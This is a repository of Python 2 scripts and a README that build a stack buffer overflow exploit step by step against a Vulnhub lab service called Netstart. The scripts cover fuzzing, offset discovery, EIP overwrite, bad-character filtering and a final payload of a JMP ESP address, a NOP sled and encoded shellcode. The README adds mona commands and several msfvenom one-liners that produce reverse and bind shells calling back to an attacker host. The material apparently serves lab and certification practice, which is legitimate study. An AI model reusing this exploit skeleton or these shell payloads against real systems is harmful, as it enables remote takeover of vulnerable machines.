├── 01_fuzzingCrashingProgram.py ├── 02_findingtheOffset.py ├── 03_overwritingEIP.py ├── 04_findingBadChars.py ├── 04_findingBadChars_netstart.py ├── 05_genshell.py ├── LICENSE └── README.md /01_fuzzingCrashingProgram.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #once the program crashes in Windows, CLOSE it manually or this PROGRAM may keep running forever 4 | 5 | import sys,socket 6 | from time import sleep 7 | 8 | buffer = "A"*100 9 | ip = '192.168.10.51' 10 | port = 2371 11 | while True: 12 | try: 13 | print ("Sending buffer of length " + str(len(buffer)) ) 14 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 15 | s.settimeout(2) 16 | res = s.connect_ex((ip,port)) 17 | 18 | if res == 0: 19 | print("The Port is open\n") 20 | 21 | else: 22 | print("The Port is closed\n") 23 | s.close() 24 | sys.exit() 25 | 26 | 27 | 28 | res = s.connect((ip,port)) 29 | buffer = buffer + "A"*250 30 | s.send((buffer)) 31 | s.close() 32 | sleep(2) 33 | 34 | 35 | except: 36 | print ("Program crashed at %s bytes" %str(len(buffer))) 37 | sys.exit() 38 | -------------------------------------------------------------------------------- /02_findingtheOffset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys,socket 4 | 5 | #msf-pattern_create -l 1850 [vulnhub netstart by foxlox] 6 | ip = '192.168.10.51' 7 | port = 2371 8 | 9 | offset = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj" 10 | 11 | try: 12 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 13 | s.connect((ip,port)) 14 | s.send((offset)) 15 | s.close() 16 | 17 | except: 18 | print("Error connecting to server") 19 | sys.exit() 20 | -------------------------------------------------------------------------------- /03_overwritingEIP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys,socket 4 | 5 | shellcode = 'A'*1702 + 'B'*4 #if done correctly, you should see the EIP filled with 42424242 6 | 7 | ip = '192.168.10.51' 8 | port = 2371 9 | 10 | try: 11 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 12 | s.connect((ip,port)) 13 | s.send((shellcode)) 14 | s.close() 15 | 16 | except: 17 | print("Error connecting to server") 18 | sys.exit() 19 | -------------------------------------------------------------------------------- /04_findingBadChars.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys,socket 4 | 5 | ip = '192.168.10.51' 6 | port = 2371 7 | 8 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 9 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 10 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 11 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 12 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 13 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 14 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 15 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 16 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 17 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 18 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 19 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 20 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 21 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 22 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 23 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 24 | 25 | 26 | shellcode = 'A'*1702 + 'B'*4 + badchars 27 | 28 | try: 29 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 30 | s.connect((ip,port)) 31 | s.send((shellcode)) 32 | s.close() 33 | 34 | except: 35 | print("Error connecting to server") 36 | sys.exit() 37 | -------------------------------------------------------------------------------- /04_findingBadChars_netstart.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys,socket 4 | 5 | ''' 6 | ### in immunity follow ESP in DUMP and see manally for something not in sequence### 7 | keep removing the badchars from badchars array and keep resending unless you reach to FF 8 | 9 | 1st badchar = \x2d 10 | 2nd badchar = \x2e 11 | 3rd badchar = \x46 12 | 4th badchar = \x47 13 | 5th badchar = \x59 14 | 6th bachar = \x5e 15 | 7th badchar = \x60 16 | ''' 17 | ip = '192.168.10.51' 18 | port = 2371 19 | 20 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 21 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 22 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2f\x30" 23 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 24 | "\x41\x42\x43\x44\x45\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 25 | "\x51\x52\x53\x54\x55\x56\x57\x58\x5a\x5b\x5c\x5d\x5f" 26 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 27 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 28 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 29 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 30 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 31 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 32 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 33 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 34 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 35 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 36 | 37 | 38 | 39 | shellcode = 'A'*1702 + 'B'*4 + badchars 40 | 41 | try: 42 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 43 | s.connect((ip,port)) 44 | s.send((shellcode)) 45 | s.close() 46 | 47 | except: 48 | print("Error connecting to server") 49 | sys.exit() 50 | -------------------------------------------------------------------------------- /05_genshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys,socket 4 | 5 | ''' 6 | #gets reverse shell back on windows 07, successfully 7 | #Kali port = 1234 8 | #Kali IP = 192.168.10.6 9 | 10 | overflow = ("\x33\xc9\xb1\x51\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19" 11 | "\xf3\xca\xde\x83\xeb\xfc\xe2\xf4\xe5\x1b\x48\xde\x19\xf3\xaa" 12 | "\x57\xfc\xc2\x0a\xba\x92\xa3\xfa\x55\x4b\xff\x41\x8c\x0d\x78" 13 | "\xb8\xf6\x16\x44\x80\xf8\x28\x0c\x66\xe2\x78\x8f\xc8\xf2\x39" 14 | "\x32\x05\xd3\x18\x34\x28\x2c\x4b\xa4\x41\x8c\x09\x78\x80\xe2" 15 | "\x92\xbf\xdb\xa6\xfa\xbb\xcb\x0f\x48\x78\x93\xfe\x18\x20\x41" 16 | "\x97\x01\x10\xf0\x97\x92\xc7\x41\xdf\xcf\xc2\x35\x72\xd8\x3c" 17 | "\xc7\xdf\xde\xcb\x2a\xab\xef\xf0\xb7\x26\x22\x8e\xee\xab\xfd" 18 | "\xab\x41\x86\x3d\xf2\x19\xb8\x92\xff\x81\x55\x41\xef\xcb\x0d" 19 | "\x92\xf7\x41\xdf\xc9\x7a\x8e\xfa\x3d\xa8\x91\xbf\x40\xa9\x9b" 20 | "\x21\xf9\xac\x95\x84\x92\xe1\x21\x53\x44\x9b\xf9\xec\x19\xf3" 21 | "\xa2\xa9\x6a\xc1\x95\x8a\x71\xbf\xbd\xf8\x1e\x0c\x1f\x66\x89" 22 | "\xf2\xca\xde\x30\x37\x9e\x8e\x71\xda\x4a\xb5\x19\x0c\x1f\x8e" 23 | "\x49\xa3\x9a\x9e\x49\xb3\x9a\xb6\xf3\xfc\x15\x3e\xe6\x26\x5d" 24 | "\xb4\x1c\x9b\x0a\x76\x13\xf5\xa2\xdc\x19\xf7\x18\x57\xff\x99" 25 | "\xda\x88\x4e\x9b\x53\x7b\x6d\x92\x35\x0b\x9c\x33\xbe\xd2\xe6" 26 | "\xbd\xc2\xab\xf5\x9b\x3a\x6b\xbb\xa5\x35\x0b\x71\x90\xa7\xba" 27 | "\x19\x7a\x29\x89\x4e\xa4\xfb\x28\x73\xe1\x93\x88\xfb\x0e\xac" 28 | "\x19\x5d\xd7\xf6\xdf\x18\x7e\x8e\xfa\x09\x35\xca\x9a\x4d\xa3" 29 | "\x9c\x88\x4f\xb5\x9c\x90\x4f\xa5\x99\x88\x71\x8a\x06\xe1\x9f" 30 | "\x0c\x1f\x57\xf9\xbd\x9c\x98\xe6\xc3\xa2\xd6\x9e\xee\xaa\x21" 31 | "\xcc\x48\x2a\xc3\x33\xf9\xa2\x78\x8c\x4e\x57\x21\xcc\xcf\xcc" 32 | "\xa2\x13\x73\x31\x3e\x6c\xf6\x71\x99\x0a\x81\xa5\xb4\x19\xa0" 33 | "\x35\x0b") 34 | ''' 35 | ip = '192.168.10.51' 36 | port = 2371 37 | 38 | overflow = ("\x31\xc9\xb1\x11\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x79" 39 | "\xf2\x7c\x77\x83\xeb\xfc\xe2\xf4\x48\x29\x8b\x94\x2a\xb1\x2f" 40 | "\x1d\x7b\x7b\x9d\xc7\x1f\x3f\xfc\xe4\x20\x42\x43\xba\xf9\xbb" 41 | "\x05\x8e\x11\x32\xd4\x7d\x7f\x9a\x7e\x77\x7d\x20\xf5\x96\xc9" 42 | "\x94\x2c\x26\x2a\x41\x7f\xfe\x98\x3f\xfc\x25\x11\x9c\x53\x04" 43 | "\x11\x9a\x53\x58\x1b\x9b\xf5\x94\x2b\xa1\xf5\x96\xc9\xf9\xb1" 44 | "\xf7") 45 | 46 | #JMP01 = 0x 625012b8 47 | #JMP02 = 0x 625012c5 48 | shellcode = 'A'*1702 + "\xb8\x12\x50\x62" +"\x90"*16 + overflow 49 | 50 | try: 51 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 52 | s.connect((ip,port)) 53 | s.send((shellcode)) 54 | s.close() 55 | 56 | except: 57 | print("Error connecting to server") 58 | sys.exit() 59 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 F-Masood 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Exploiting Stackbased Buffer Overflow 2 | Python2 based Bufferoverflow scripts I developed while doing the box **Netsart** by **Foxlox** on **Vulnhub**. 3 | 4 | **Update Jan 2022**: Following skeleton code worked in my eCPPT, OSCP etc. with small modifications e.g adding '\n' when sending a command. ;-) 5 | 6 | **Walkthrough** link: https://grumpygeekwrites.wordpress.com/2020/12/07/netstart-vulnhub-walk-through-tutorial/ 7 | 8 | Also Works with: 9 | > 1. Brainpan Vulnhub (tested) 10 | > 1. Dostackbufferoverflowgood (tested, remember to add "\n" at the end of buffer) 11 | > 1. Offensive Security PG Practice box 12 | > 1. School Vulnhub (tested, but msf_pattern command needs to be modified) 13 | 14 | IMP steps to remember are: 15 | > 1. Spiking. 16 | > 1. Fuzzing / Crashing the program with some bytes. 17 | > 1. Noting down those bytes. 18 | > 1. Creating a unique **pattern** via **MSF** of those bytes length and sending it to the program. 19 | > 1. Again crashing the program and noting down the value of **EIP**. 20 | > 1. Giving the EIP value to MSF **offset** for finding the exact crash point. 21 | > 1. Controlling **EIP**, to check whether our EIP is filled with 04 x B (EIP = 42 42 42 24) 22 | > 1. Finding badchars, [follow **ESP in dump**] removing it from the BadChars array again and again. We should see neat and clean output from 0000-FFFF. 23 | > 1. Finding the JMP address in ".dll" using mona. 24 | > 1. Use command01= ```!mona modules``` --- command02= ```!mona find -s '\xff\xe4' -m login_support.dll```. Note down all the addresses. 25 | > 1. If mona fails, manually use SEARCH COMMAND and look for **JMP ESP** address. 26 | > 1. If there is no module (.dll) file use this ```command03 = !mona jmp -r esp -cpb "\x00"``` 27 | > 1. If there is no module (.dll) file use this PUSH ESP command04 = ```!mona find -s "\x54\xc3" -m bufferoverflow.exe``` 28 | > 1. Generating a SHELL payload using MSF Venom; remember to select proper architecture and specifying the BADCHARS we found. 29 | > 1. We should now get shell, our PAYLOAD would be something like ---> **A*(offset value) + JMP Address in little endian format + 8/16/32 NOPs + shellcode** 30 | 31 | **What it means** 32 | > 1. **RHOST = remote host -> Kali Box IP** 33 | > 1. **RPORT = remote port -> Kali Box Port** 34 | > 1. **LPORT = local port --> BoF box port (used for BindShell) ** 35 | > 36 | **Generate Shell for Windows**: 37 | > 1. ```msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.100 LPORT=1234 EXITFUNC=thread –e x86/shikata_ga_nai -b "\x00\x2d\x2e\x46\x47\x59\x5e\x60" -f c``` 38 | > 1. ```msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/fnstenv_mov -b "\x04\xA0" [vulnhub school]``` 39 | > 1. ```msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.110 LPORT=80 EXITFUNC=thread -b "\x00\x16\x2F\xF4\xFD" -f c [tryhackme BoF 5]``` 40 | > 1. ```msfvenom -p windows/shell_bind_tcp RHOST=192.168.10.100 LPORT=12345 EXITFUNC=thread -b "\x00\x16\x2F\xF4\xFD" -f c [tryhackem BoF 5]``` 41 | 42 | **Generate Bind Shell for Windows w/meterpreter**: 43 | > 1. ```use exploit/multi/handler``` 44 | > 1. ```set payload: windows/meterpreter/bind_tcp``` 45 | > 1. ```set EXITFUNC: thread``` 46 | > 1. ```set LPORT: 12345``` 47 | > 1. ```set RHOST: 192.168.10.100``` 48 | > 1. ```msfvenom -p windows/meterpreter/bind_tcp RHOST=192.168.10.100 LPORT=12345 EXITFUNC=thread -b "\x00\x16\x2F\xF4\xFD" -f c [tryhackem BoF 5]``` 49 | 50 | **Generate Reverse Shell for Windows w/meterpreter**: 51 | > 1. ```msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.10.110 RPORT=12345 EXITFUNC=thread -b "\x00\x16\x2F\xF4\xFD" -f c [tryhackem BoF 5]``` 52 | 53 | **Generate rev-shell for Linux**: 54 | > 1. msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.10.6 LPORT=1234 EXITFUNC=thread -b "\x00\x2d\x2e\x46\x47\x59\x5e\x60" -f c 55 | > 1. from OSPG -> msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.118.5 LPORT=2121 -f py -b "\x00" EXITFUNC=thread 56 | 57 | **From School (vulnhub) the msf-pattern_create fails**: 58 | > 1. ```msf-pattern_create -l 2100 -s ABCDEFGHIKL,alienum,123456789``` 59 | > 1. ```msf-pattern_offset -q 4C35614C -l 2100 -s ABCDEFGHIKL,alienum,123456789``` 60 | --------------------------------------------------------------------------------